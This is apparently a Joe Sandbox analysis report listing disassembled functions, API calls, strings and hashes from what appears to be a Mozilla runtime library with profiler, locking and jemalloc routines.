                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4087a622cbe2cacb7da9fb031034f1cdb9fdcb01528c9f0a7d5cf163291a31a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3621E7B0744308ABFB216A648C45FBB737CDFEAB04F044528F6059B2C0C674DD5487A1
                                                                                                                                                                                                                                                                                        Function 6C9AF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF619
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9AF598), ref: 6C9AF621
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF637
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000,?,6C9AF598), ref: 6C9AF645
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000,?,6C9AF598), ref: 6C9AF663
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9AF62A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                        • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                        • Opcode ID: 12b28d3b2159fd39c927440be4bfae936491006cf8536564aa65cbad92c7b0c2
                                                                                                                                                                                                                                                                                        • Instruction ID: e1879e1a373abe1aa51c9055cfeb1370ac9163b44ab9269262a89e67be4e0c71
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12b28d3b2159fd39c927440be4bfae936491006cf8536564aa65cbad92c7b0c2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5411A775205605AFCB84AF98D8489E5777DFFAA35CB201416EA0583F01DB72E826CBA4
                                                                                                                                                                                                                                                                                        Function 6C971FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C971FDE
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C971FFD
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C972011
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C972059
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                        • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b2094eb3b184429602b3c9e922f4d5e755ce8be4165474fec6e6eb7165eca3a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f31875d8ca2668301e76d892be7034fafcae000e400072622c81176fbf291f8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b2094eb3b184429602b3c9e922f4d5e755ce8be4165474fec6e6eb7165eca3a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A112C75609204EBDF608F55D84DE6A3B79EFBE359F20402AE90692640CB31D910CEB1
                                                                                                                                                                                                                                                                                        Function 6C970EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: EnterCriticalSection.KERNEL32(6C9EE370,?,?,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284), ref: 6C99AB94
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99AB89: LeaveCriticalSection.KERNEL32(6C9EE370,?,6C9634DE,6C9EF6CC,?,?,?,?,?,?,?,6C963284,?,?,6C9856F6), ref: 6C99ABD1
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C99D9F0,00000000), ref: 6C970F1D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C970F3C
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C970F50
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C99D9F0,00000000), ref: 6C970F86
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                                                        • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                                                                                        • Opcode ID: 3cf65f6fe8c9abbcb795bc804a77deacc4e865e34af6de6928b633bea4984c22
                                                                                                                                                                                                                                                                                        • Instruction ID: b676c1c2aa88471308af12c15927b2d26d4262a079336ec2b2dc6600965b077b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cf65f6fe8c9abbcb795bc804a77deacc4e865e34af6de6928b633bea4984c22
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A11737460A240DBEF50CF95D908A653778EFBF329F24522AE90592740DB31E415CA65
                                                                                                                                                                                                                                                                                        Function 6C9AF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF559
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AF561
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AF585
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AF5A3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C9AF3A8
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C9AF499
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_resume, xrefs: 6C9AF239
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C9AF56A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                        • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                        • Opcode ID: 3ff0dd58e4657b3c75157baa95db13beecb4840fb2285a489ad0172204c941bf
                                                                                                                                                                                                                                                                                        • Instruction ID: 93a42a3ae3067a7dd972a9743c6cb253c72eab6614be56bdaba885bf3163687f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff0dd58e4657b3c75157baa95db13beecb4840fb2285a489ad0172204c941bf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EF054756043049FDB406BA5D84CA6A7BBDFFBE29DF204416EA0583701EB76C80587A9
                                                                                                                                                                                                                                                                                        Function 6C9AF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF619
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9AF598), ref: 6C9AF621
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF637
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000,?,6C9AF598), ref: 6C9AF645
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8,?,?,00000000,?,6C9AF598), ref: 6C9AF663
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9AF62A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                        • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                                                        • Opcode ID: 802c70fcc395602e3e8fe1285f664d55bc924bfb645c51a2486f854559f554cd
                                                                                                                                                                                                                                                                                        • Instruction ID: cfd4dcafb69513db6cb2eb419df3cab5a0b87caa47a5c37ff53383c573de23b4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 802c70fcc395602e3e8fe1285f664d55bc924bfb645c51a2486f854559f554cd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0B475204304AFDB406BA4D84CA6A7BBCFFFE29DF200416EA0583711DB36880687A8
                                                                                                                                                                                                                                                                                        Function 6C970E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C970DF8), ref: 6C970E82
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C970EA1
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C970EB5
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C970EC5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                        • Opcode ID: 0dd5b5c6a5f2a2fd55f6c8fb3a419b8a608b444d900cfd1c69ca13055d01cc97
                                                                                                                                                                                                                                                                                        • Instruction ID: cb9c7f8a0f3b5e6c6ec42031fb579f23d5260a6e7eaad4b66fb0197db783d528
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dd5b5c6a5f2a2fd55f6c8fb3a419b8a608b444d900cfd1c69ca13055d01cc97
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0014B70B09381CBDF508FEAE854A4233B5EFAEB1CF20552AD90182B40EB33E4448A65
                                                                                                                                                                                                                                                                                        Function 6C9A05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C99CFAE,?,?,?,6C9631A7), ref: 6C9A05FB
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C99CFAE,?,?,?,6C9631A7), ref: 6C9A0616
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9631A7), ref: 6C9A061C
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9631A7), ref: 6C9A0627
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _writestrlen
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 63580b97ba554b4e736c35958c7987b049da0421afda296d895078f98f1c07d4
                                                                                                                                                                                                                                                                                        • Instruction ID: a38da1d309b1533c4685862c5a026f5d961b099aec86a31da728e9b2e11d8add
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63580b97ba554b4e736c35958c7987b049da0421afda296d895078f98f1c07d4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7E08CE2A0111037F6142296AC86DBBB71CDBEA134F090039FD0D92701E94AFD1A52F6
                                                                                                                                                                                                                                                                                        Function 6C9705F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 212d9bbaa43b503b91853b73b553c92d5bfa7a1cfbba9234424a45246e1306a7
                                                                                                                                                                                                                                                                                        • Instruction ID: 25e7542d1f47cc95e41a58ec81640489b08a0e7094f512fe028eb2741d4b8e12
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 212d9bbaa43b503b91853b73b553c92d5bfa7a1cfbba9234424a45246e1306a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11A158B0A05705CFDB24CF29C994A99FBF5BF59304F1486AED44A97B00E731A945CFA0
                                                                                                                                                                                                                                                                                        Function 6C9C14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9C14C5
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9C14E2
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9C1546
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C9C15BA
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9C16B4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6df77ac436fef85cd87c91b40858f1121ce221d569c2ce2cf1e92143b90c5a65
                                                                                                                                                                                                                                                                                        • Instruction ID: b7ddb7610c04cd1dd296049144f7fc88b74621e4345d0fe11369e7d7c606cb7f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6df77ac436fef85cd87c91b40858f1121ce221d569c2ce2cf1e92143b90c5a65
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D961E271A047409BDB11CF20C880BDEB7B8BFAA308F44851CED8A67711DB31E959CB96
                                                                                                                                                                                                                                                                                        Function 6C9B9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B9FDB
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C9B9FF0
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C9BA006
